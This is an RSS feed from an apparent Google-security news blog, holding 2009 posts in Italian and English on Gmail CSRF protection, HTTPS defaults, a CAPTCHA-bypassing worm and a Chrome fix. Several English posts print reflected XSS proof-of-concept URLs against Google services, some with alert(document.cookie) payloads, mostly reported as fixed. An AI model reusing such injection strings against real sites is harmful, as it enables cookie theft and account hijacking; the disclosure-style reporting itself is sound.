<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GoogleBig &#187; Google Vulns</title>
	<atom:link href="http://www.googlebig.com/category/google-vulnerabilities/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.googlebig.com</link>
	<description></description>
	<lastBuildDate>Tue, 18 Jun 2013 18:14:00 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Google protegge Gmail e YouTube dagli attacchi cross-site</title>
		<link>http://www.googlebig.com/2009/10/06/google-protegge-gmail-e-youtube-dagli-attacchi-cross-site/</link>
		<comments>http://www.googlebig.com/2009/10/06/google-protegge-gmail-e-youtube-dagli-attacchi-cross-site/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 09:23:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=2421</guid>
		<description><![CDATA[Dopo tre anni l&#8217;azienda ha adottato un sistema per proteggere gli account dei propri utenti. Google ha finalmente aumentato la sicurezza dei propri servizi introducendo un sistema di protezioni dagli [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/03/06/gmail-ancora-a-rischio-di-cross-site-request-forgery/' rel='bookmark' title='Gmail ancora a rischio di cross-site request forgery'>Gmail ancora a rischio di cross-site request forgery</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/vulnerability-cross-site-injection-last-xss-on-imagesgooglecom/' rel='bookmark' title='[Vulnerability Cross Site Injection] Last XSS on images.google.com'>[Vulnerability Cross Site Injection] Last XSS on images.google.com</a></li>
<li><a href='http://www.googlebig.com/2009/01/30/google-sites-reflective-cross-site-scripting/' rel='bookmark' title='Google Sites Reflective Cross-Site Scripting'>Google Sites Reflective Cross-Site Scripting</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p>Dopo tre anni l&#8217;azienda ha adottato un sistema per proteggere gli account dei propri utenti.<span id="more-2421"></span></p>
<p>Google ha finalmente aumentato la sicurezza dei propri servizi introducendo un sistema di protezioni dagli attacchi di tipo <strong>Csrf (Cross-site Request Forgery)</strong>.</p>
<p>In un attacco <strong>Csrf</strong>, le credenziali dell&#8217;utente &#8220;fidato&#8221; di un servizio vengono usate da una terza persona per i propri scopi: per esempio, mentre è aperta nel browser <strong>una sessione di Gmail il proprietario di un sito malevolo che stiamo visitando potrebbe usare le nostre credenziali per farsi consegnare la lista dei contatti</strong>, o per inviare email al nostro posto.</p>
<p>Gmail non è l&#8217;unico servizio di <strong>Google che finora presentava questa vulnerabilità</strong>; anche YouTube, per esempio, ne era affetto.</p>
<p><strong>Il rimedio</strong> adottato da Google consiste nella <strong>generazione di un token univoco</strong> (conservato in un cookie) all&#8217;apertura della sessione: <strong>per ogni richiesta sarà necessario che il sistema fornisca questo token</strong> (che in fondo è una stringa di testo che funge da sistema di validazione dell&#8217;identità dell&#8217;utente). Se una richiesta ne è sprovvista, essa viene negata.</p>
<p><strong>Ci sono voluti tre anni</strong>, da quando la vulnerabilità è stata segnalata, prima che Google mettesse mano al problema.</p>
<p>From: <a href="http://www.zeusnews.it/index.php3?ar=stampa&amp;cod=11093" target="_blank">http://www.zeusnews.it</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/03/06/gmail-ancora-a-rischio-di-cross-site-request-forgery/' rel='bookmark' title='Gmail ancora a rischio di cross-site request forgery'>Gmail ancora a rischio di cross-site request forgery</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/vulnerability-cross-site-injection-last-xss-on-imagesgooglecom/' rel='bookmark' title='[Vulnerability Cross Site Injection] Last XSS on images.google.com'>[Vulnerability Cross Site Injection] Last XSS on images.google.com</a></li>
<li><a href='http://www.googlebig.com/2009/01/30/google-sites-reflective-cross-site-scripting/' rel='bookmark' title='Google Sites Reflective Cross-Site Scripting'>Google Sites Reflective Cross-Site Scripting</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/10/06/google-protegge-gmail-e-youtube-dagli-attacchi-cross-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New critical XSS bug in GoogleLabs</title>
		<link>http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/</link>
		<comments>http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 10:00:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1806</guid>
		<description><![CDATA[Our friend iter has discovered a vulnerability in GoogleLabs, which could be exploited by malicious people to conduct XSS attacks and Cookie Grabbing Attack. XSS: http://www.googlelabs.com/?q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&#38;apps=Search+Labs http://www.googlelabs.com/?q=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&#038;apps=Search+Labs STATUS: 30 june [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/' rel='bookmark' title='New critical XSS bug in Google Code Search'>New critical XSS bug in Google Code Search</a></li>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p>Our friend <strong>iter</strong> has discovered a <strong>vulnerability</strong> in <a href="http://www.googlelabs.com/" target="_blank">GoogleLabs</a>, which could be exploited by malicious people to conduct <strong>XSS</strong> attacks and <strong>Cookie Grabbing Attack.</strong><span id="more-1806"></span></p>
<p><strong>XSS:</strong></p>
<blockquote><p><code>http://www.googlelabs.com/?q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&amp;apps=Search+Labs</code></p></blockquote>
<blockquote><p><code>http://www.googlelabs.com/?q=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&#038;apps=Search+Labs</code></p></blockquote>
<p><strong>STATUS:</strong> 30 june 1:18 am<strong><span style="color: #00ff00;">FIXED</span></strong></p>
<p><a href="http://www.googlebig.com/wp-content/uploads/2009/06/xss-googlelabs.jpg" target="_blank"><img class="aligncenter size-full wp-image-1770" title="xss_google_code_search" src="http://www.googlebig.com/wp-content/uploads/2009/06/xss-googlelabs.jpg" alt="xss_google_code_search" width="550" height="331" /></a></p>
<p><a href="http://www.googlebig.com/wp-content/uploads/2009/06/xss-googlelabs2.jpg" target="_blank"><img class="aligncenter size-full wp-image-1770" title="xss_google_code_search" src="http://www.googlebig.com/wp-content/uploads/2009/06/xss-googlelabs2.jpg" alt="xss_google_code_search" width="550" height="331" /></a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/' rel='bookmark' title='New critical XSS bug in Google Code Search'>New critical XSS bug in Google Code Search</a></li>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New critical XSS bug in Google Code Search</title>
		<link>http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/</link>
		<comments>http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/#comments</comments>
		<pubDate>Sun, 21 Jun 2009 11:03:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1767</guid>
		<description><![CDATA[xados has discovered a vulnerability in Google Code Search, which could be exploited by malicious people to conduct XSS attacks. XSS: http://www.google.com/codesearch/p?hl=en%22;//%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%22%3E%3Cscript%3Ealert(navigator.userAgent)%3C/script%3E&#38;sa=N&#38;cd=2&#38;ct=By_XaDoS STATUS: 21 june 5:40 p.m.FIXED Other XSS by [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/' rel='bookmark' title='New critical XSS bug in GoogleLabs'>New critical XSS bug in GoogleLabs</a></li>
<li><a href='http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/' rel='bookmark' title='Three new XSS of Google: Knol, Books and Google!'>Three new XSS of Google: Knol, Books and Google!</a></li>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p><strong>xados </strong>has discovered a vulnerability in <a href="http://www.google.com/codesearch" target="_blank">Google Code Search</a>, which could be exploited by malicious people to conduct XSS attacks.<span id="more-1767"></span></p>
<p><strong>XSS:</strong></p>
<blockquote><p><code>http://www.google.com/codesearch/p?hl=en%22;//%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%22%3E%3Cscript%3Ealert(navigator.userAgent)%3C/script%3E&amp;sa=N&amp;cd=2&amp;ct=By_XaDoS</code></p></blockquote>
<p><strong>STATUS:</strong> 21 june 5:40 p.m.<strong><span style="color: #00ff00;">FIXED</span></strong></p>
<p><img class="aligncenter size-full wp-image-1770" title="xss_google_code_search" src="http://www.googlebig.com/wp-content/uploads/2009/06/xss_google_code_search.jpg" alt="xss_google_code_search" width="550" height="331" /></p>
<p><strong>Other XSS by xados</strong>:</p>
<p><a href="http://xssed.com/archive/author=xados/" target="_blank">http://xssed.com/archive/author=xados/</a><br />
<a href="http://www.googlebig.com/forum/search.php?action=results&amp;sid=6f4a70bca1c0f2bee310e3e1745a9d94" target="_blank">http://www.googlebig.com/forum/search.php?action=results&amp;sid=6f4a70bca1c0f2bee310e3e1745a9d94</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/' rel='bookmark' title='New critical XSS bug in GoogleLabs'>New critical XSS bug in GoogleLabs</a></li>
<li><a href='http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/' rel='bookmark' title='Three new XSS of Google: Knol, Books and Google!'>Three new XSS of Google: Knol, Books and Google!</a></li>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gmail sotto accusa: è poco sicura. Google smentisce</title>
		<link>http://www.googlebig.com/2009/06/18/gmail-sotto-accusa-e-poco-sicura-google-smentisce/</link>
		<comments>http://www.googlebig.com/2009/06/18/gmail-sotto-accusa-e-poco-sicura-google-smentisce/#comments</comments>
		<pubDate>Thu, 18 Jun 2009 06:27:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Gmail]]></category>
		<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1750</guid>
		<description><![CDATA[Un gruppo di ricercatori e accademici ha inviato una lettera aperta a Google lamentando la mancanza di soluzioni valide per garantire la sicurezza dei dati degli utenti. Il motore di [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/08/11/poco-per-volta-google-rinnova-maps/' rel='bookmark' title='Poco per volta, Google rinnova Maps'>Poco per volta, Google rinnova Maps</a></li>
<li><a href='http://www.googlebig.com/2008/11/27/google-tutto-ok-gmail-e-sicura/' rel='bookmark' title='Google: tutto ok, Gmail è sicura'>Google: tutto ok, Gmail è sicura</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/violato-il-captcha-di-gmail/' rel='bookmark' title='Violato il CAPTCHA di Gmail'>Violato il CAPTCHA di Gmail</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p>Un gruppo di ricercatori e accademici ha inviato una lettera aperta a Google lamentando la mancanza di soluzioni valide per garantire la sicurezza dei dati degli utenti. Il motore di ricerca smentisce<span id="more-1750"></span> e riconferma l&#8217;impegno per l&#8217;adozione di HTTPS.</p>
<p><strong>Gmail e i servizi cloud offerti da Google devono offrire una maggiore protezione dei dati degli utenti.</strong> Non hanno dubbi in proposito i <strong>firmatari di una lettera aperta da poco indirizza al CEO di Mountain View</strong>, Eric Schmidt. Gli autori della missiva sono ricercatori e docenti universitari preoccupati dalla possibilità che i servizi online offerti da Google possano portare al furto di dati e a non pochi rischi legati alla privacy. <strong>Una tesi sostanzialmente respinta dal motore di ricerca.</strong></p>
<p>«Le impostazioni predefinite di Google mettono inutilmente a rischio i consumatori. <strong>I servizi di Google proteggono username e password degli utenti da occhi indiscreti e da possibili furti. </strong>Tuttavia, quando un utente compone email, documenti, fogli di calcolo, presentazioni e appuntamenti sui calendari, questi dati potenzialmente sensibili vengono trasferiti sui server di Google in chiaro, consentendo a chiunque con gli opportuni strumenti di rubare tali informazioni» scrivono i 36 esperti nella lettera aperta [<a href="http://files.cloudprivacy.net/google-letter-final.pdf" target="_blank">pdf</a>] indirizza al primo responsable di Mountain View, sottolineando quella che appare come una grave carenza di sicurezza ai loro occhi.</p>
<p>Sotto accusa è principalmente l&#8217;utilizzo dello standard di sicurezza HTTPS per un numero limitato di operazioni effettuate attraverso i servizi cloud offerti dal colosso delle ricerche online: «Google utilizza lo standard Hypertext Transfer Protocol Secure (<strong>HTTPS</strong>) come tecnologia per <strong>criptare i dati e proteggere le informazioni inserite dagli utenti</strong> per effettuare i login. Tuttavia, il sistema di criptazione non è abilitato come impostazione predefinita per proteggere altre informazioni trasmesse dagli utenti attraverso Google Mail, Docs e Calendar. Così, chiunque utilizzi i servizi di Google da una connessione pubblica (come un network aperto wireless in una caffetteria, in biblioteca o a scuola) rischia di subire il furto dei dati sensibili, anche da utenti malintenzionati poco preparati. Gli strumenti per rubare le informazioni sono ampiamente disponibili su Internet».</p>
<p>Gli autori della lettera sottolineano come <strong>buona parte dei servizi</strong> cloud offerti da Google <strong>possano essere manualmente configurati per utilizzare sempre lo standard HTTPS</strong>, sottraendo i propri dati dagli sguardi indiscreti in Rete. Tale operazione richiede però un certo grado di consapevolezza da parte degli abbonati ai servizi di Mountain View e sufficienti conoscenze tecniche, particolare che dovrebbe indurre Google a rendere predefinite le impostazioni legate a HTTPS. Secondo i ricercatori e gli accademici, utilizzare lo standard sicuro come impostazione predefinita causerebbe un minimo calo delle prestazioni dei servizi cloud, ma consentirebbe agli utenti di proteggere con maggiore efficacia i dati caricati sui loro account.</p>
<p>From: <a href="http://www.webnews.it/news/leggi/10981/gmail-sotto-accusa-e-poco-sicura/" target="_blank">http://www.webnews.it</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/08/11/poco-per-volta-google-rinnova-maps/' rel='bookmark' title='Poco per volta, Google rinnova Maps'>Poco per volta, Google rinnova Maps</a></li>
<li><a href='http://www.googlebig.com/2008/11/27/google-tutto-ok-gmail-e-sicura/' rel='bookmark' title='Google: tutto ok, Gmail è sicura'>Google: tutto ok, Gmail è sicura</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/violato-il-captcha-di-gmail/' rel='bookmark' title='Violato il CAPTCHA di Gmail'>Violato il CAPTCHA di Gmail</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/06/18/gmail-sotto-accusa-e-poco-sicura-google-smentisce/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Three new XSS of Google: Knol, Books and Google!</title>
		<link>http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/</link>
		<comments>http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/#comments</comments>
		<pubDate>Wed, 06 May 2009 13:36:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1450</guid>
		<description><![CDATA[Black-Hacker has discovered a vulnerability in www.google.com, which could be exploited by malicious people to conduct XSS attacks. URL: https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22BlackHacker[dot]Coder[at]Gmail[dot]com%22)%3C/script%3E=00000&#38;hl=tr &#62; Mirror &#60; The other two new XSS of Google: [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
<li><a href='http://www.googlebig.com/2009/04/16/a-vulnerability-on-groupsgooglecom-has-been-founded/' rel='bookmark' title='A vulnerability on groups.google.com has been founded'>A vulnerability on groups.google.com has been founded</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p><strong>Black-Hacker</strong> has discovered a vulnerability in <strong>www.google.com</strong>, which could be exploited by malicious people to conduct XSS attacks.<span id="more-1450"></span></p>
<p><strong>URL:</strong></p>
<blockquote><p>https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22BlackHacker[dot]Coder[at]Gmail[dot]com%22)%3C/script%3E=00000&amp;hl=tr</p></blockquote>
<p>&gt; <a href="http://www.xssed.com/mirror/60278/" target="_blank">Mirror</a> &lt;</p>
<p>The other two new XSS of Google:</p>
<p><strong>- knol.google.com | Author: </strong><a href="http://www.xssed.com/archive/author=Azat%20Harutyunyan/">Azat Harutyunyan</a> | &gt; <a href="http://www.xssed.com/mirror/60339/" target="_blank">Mirror</a> &lt;</p>
<p><strong>URL:</strong></p>
<blockquote><p>http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&amp;q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&amp;qexact=&amp;qor1=%3E%3Cscript%3Ealert(/xss%20by%20azat/)%3C/script%3E&amp;qor2=%3E%3Cscript%3Ealert(/xss%20by%20azat/)%3C/script%3E&amp;qor3=&amp;qneg=&amp;doctype=0&amp;loc0=on&amp;loc1=on&amp;loc3=on&amp;loc4=on&amp;loc5=on&amp;loc7=on&amp;restrict=3&amp;url=%3E%3Cscript%3Ealert(/xss/)%3C/script3E&amp;editdate=0&amp;createdate=0&amp;language=0&amp;license=0&amp;collab=0&amp;link=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&amp;templateUrl=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&amp;promo=&amp;sort=0&amp;num=10</p></blockquote>
<p><strong>- books.google.com | Author: </strong><a href="http://www.xssed.com/archive/author=HacKSever/">HacKSever</a> | &gt; <a href="http://www.xssed.com/mirror/59699/" target="_blank">Mirror</a> &lt;</p>
<p><strong>URL:</strong></p>
<blockquote><p>http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&amp;btnG=Kitaplar%C4%B1+Ara&amp;hl=tr</p></blockquote>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2007/09/01/ghozt-has-discovered-a-vulnerability-xss-on-google/' rel='bookmark' title='XSS google.com'>XSS google.com</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
<li><a href='http://www.googlebig.com/2009/04/16/a-vulnerability-on-groupsgooglecom-has-been-founded/' rel='bookmark' title='A vulnerability on groups.google.com has been founded'>A vulnerability on groups.google.com has been founded</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Worm che bypassa il filtro CAPTCHA di Gmail</title>
		<link>http://www.googlebig.com/2009/04/29/worm-che-bypassa-il-filtro-captcha-di-gmail/</link>
		<comments>http://www.googlebig.com/2009/04/29/worm-che-bypassa-il-filtro-captcha-di-gmail/#comments</comments>
		<pubDate>Wed, 29 Apr 2009 13:52:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Gmail]]></category>
		<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1396</guid>
		<description><![CDATA[La società di sicurezza Bkis Honeypot ha scoperto nei giorni scorsi un nuovo particolare worm che riesce a mettere in crisi il CAPTCHA di Gmail. Il sistema di sicurezza, che [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/02/11/violato-il-captcha-di-gmail/' rel='bookmark' title='Violato il CAPTCHA di Gmail'>Violato il CAPTCHA di Gmail</a></li>
<li><a href='http://www.googlebig.com/2007/10/01/gmail-colpito-da-un-trojan/' rel='bookmark' title='Gmail colpito da un Trojan'>Gmail colpito da un Trojan</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/bucata-la-posta-gmail-per-problema-provider-in-kuwait/' rel='bookmark' title='Bucata la posta Gmail per problema provider in Kuwait'>Bucata la posta Gmail per problema provider in Kuwait</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<div class="entry">
<p><img id="image805" src="http://www.oneitsecurity.it/wp-content/oneitsecurity.it_uploads/2008/03/captcha.png" alt="CAPTCHA Gmail" hspace="10" align="left" /></div>
<p>La società di sicurezza <strong>Bkis Honeypot</strong> ha <a title="New worm bypasses Gmail's captcha" href="http://security.bkis.vn/?p=586">scoperto</a> nei giorni scorsi un nuovo particolare worm che riesce a mettere in crisi il <strong>CAPTCHA</strong> di <strong>Gmail</strong>.<span id="more-1396"></span> Il sistema di sicurezza, che garantisce un’iscrizione sicura effettuata da una persona in carne e ossa, in realtà viene aggirato in modo molto semplice dal malware all’atto della registrazione di un nuovo account.</p>
<p>Il malware è stato chiamato <strong>W32.Gaptcha.Worm</strong> dai laboratori che l’hanno scoperto e ha la capacità di “distruggere” letteralmente un account di posta elettronica aperto con il servizio di Google. Il worm è stato classificato con un livello medio di pericolosità, a causa della sua abilità e velocità di azione.</p>
<p>Una volta insediatosi nel sistema operativo, <strong>Gaptcha</strong> apre automaticamente una finestra di Internet Explorer, collegandosi alla pagina di Gmail che permette di <strong>registrare un nuovo account</strong>. L’utente assisterà da spettatore alle azioni del worm, ignaro di ciò che sta accadendo sul suo PC.</p>
<p>Innanzitutto se non fosse attiva una connessione ad Internet sul computer infetto, il worm crea un file.bat per eliminarsi da solo. Se invece ha la possibilità di agire, si connette ad un suo server per scoprire le caratteristiche della connessione attiva sul PC.</p>
<p>Nel campo relativo al nome e al cognome inserirà dei dati generati in modo casuale. Tra i nomi potrà inserire valori come Emily, Isabella, Desirae, Maryam, Kenia; nel campo del cognome potrà scrivere dati come Smith, Johnson.</p>
<p>A questo punto arriva il momento di <strong>bypassare il filtro CAPTCHA</strong>. Il worm scarica nella cartella dei file temporanei l’immagine dei caratteri da riconoscere, la invia ad un suo sito e successivamente l’immagine, una volta riconosciuta, viene rispedita indietro e quindi decodificata.</p>
<p>Il worm può concludere con successo la registrazione. Poi si collegherà all’account creato e cambierà le impostazioni necessarie per l’invio della posta elettronica. In seguito <strong>invierà le informazioni</strong> dell’account ai cybercriminali che controllano l’attività del malware.</p>
<p>Quando Google si accorgerà che qualcosa non va in quell’account provvederà a <strong>disabilitare la registrazione</strong>, ad impedire che l’utente possa accedere agli account Gmail esistenti o crearne di nuovi da quell’indirizzo IP, che verrà bloccato nelle liste di Google.</p>
<p>Quando il worm ha concluso la sua “opera di distruzione”, crea comunque un file che gli consentirà di <strong>auto-eliminarsi</strong> e far scomparire le sue tracce. Come sempre, il consiglio è quello di aggiornare l’antivirus con le ultime definizioni rilasciate dalle case produttrici e prestare molta attenzione.</p>
<p>From: <a href="http://www.oneitsecurity.it/27/04/2009/scoperto-un-worm-che-bypassa-il-filtro-captcha-di-gmail/" target="_blank">http://www.oneitsecurity.it</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/02/11/violato-il-captcha-di-gmail/' rel='bookmark' title='Violato il CAPTCHA di Gmail'>Violato il CAPTCHA di Gmail</a></li>
<li><a href='http://www.googlebig.com/2007/10/01/gmail-colpito-da-un-trojan/' rel='bookmark' title='Gmail colpito da un Trojan'>Gmail colpito da un Trojan</a></li>
<li><a href='http://www.googlebig.com/2008/02/11/bucata-la-posta-gmail-per-problema-provider-in-kuwait/' rel='bookmark' title='Bucata la posta Gmail per problema provider in Kuwait'>Bucata la posta Gmail per problema provider in Kuwait</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/04/29/worm-che-bypassa-il-filtro-captcha-di-gmail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Chrome 1.0.154.59: Fix Sicurezza</title>
		<link>http://www.googlebig.com/2009/04/29/google-chrome-1015459-fix-sicurezza/</link>
		<comments>http://www.googlebig.com/2009/04/29/google-chrome-1015459-fix-sicurezza/#comments</comments>
		<pubDate>Wed, 29 Apr 2009 07:43:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1394</guid>
		<description><![CDATA[Google ha rilasciato una nuova versione &#8220;stabile&#8221; del suo browser Google Chrome (1.0.154.59) ed ha aggiornato la versione distribuita sul canale Beta (2.0.172.8). Google Chrome 1.0.154.59 include un aggiornamento di [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/12/nuova-patch-di-sicurezza-per-google-chrome/' rel='bookmark' title='Nuova patch di sicurezza per Google Chrome'>Nuova patch di sicurezza per Google Chrome</a></li>
<li><a href='http://www.googlebig.com/2008/09/11/google-chrome-dev-build-021531/' rel='bookmark' title='Google Chrome Dev Build 0.2.153.1'>Google Chrome Dev Build 0.2.153.1</a></li>
<li><a href='http://www.googlebig.com/2009/06/01/google-chrome-arriva-la-30/' rel='bookmark' title='Google Chrome, arriva la 3.0'>Google Chrome, arriva la 3.0</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p><span class="Hv">Google <a href="http://googlechromereleases.blogspot.com/2009/04/stable-update-security-fix.html" target="_blank">ha rilasciato</a> una nuova versione &#8220;stabile&#8221; del suo browser  <a href="http://www.google.com/chrome/" target="_blank">Google Chrome </a> (1.0.154.59) ed <a href="http://googlechromereleases.blogspot.com/2009/04/beta-update-fix-text-disappearing-and.html" target="_blank">ha aggiornato</a> la versione distribuita sul canale Beta (2.0.172.8)</span>.<span id="more-1394"></span> <a href="http://www.google.com/chrome" target="_blank">Google Chrome 1.0.154.59</a> include un <strong>aggiornamento di protezione</strong> per un falla critica che affliggeva il codice del browser; Google Chrome Beta 2.0.172.8 introduce invece soluzione per due bug isolati nelle versione precedente.</p>
<p>Google Chrome 1.0.154.59 corregge la vulnerabilità <strong>CVE-2009-1340</strong>, &#8220;ChromeHTML protocol handler same-origin bypass&#8221;. Un <strong>errore nella gestione degli URL</strong> con un protocollo &#8220;<strong>chromehtml</strong>:&#8221; poteva in certe condizioni permettere ad un attacker di <strong>eseguire script</strong> a sua scelta sua qualsiasi pagina o accedere ad una lista di file sul disco locale. Se un utente ha installato Google Chrome, visitando in Internet Explorer una pagina web controllata dall&#8217;attacker è possibile l&#8217;esecuzione di Google Chrome, con apertura di schede multiple, e caricamento di script che si eseguono dopo la navigazione su una URL scelta dall&#8217;attacker. <span class="cross">Questo tipo di attacco funziona solo se Chrome non è già in esecuzione</span>. Maggiori dettagli sulla problematica di sicurezza sono disponibili sul sito Google Code di Chromium (<a href="http://code.google.com/p/chromium/issues/detail?id=9860" target="_blank">Issue 9860</a>).</p>
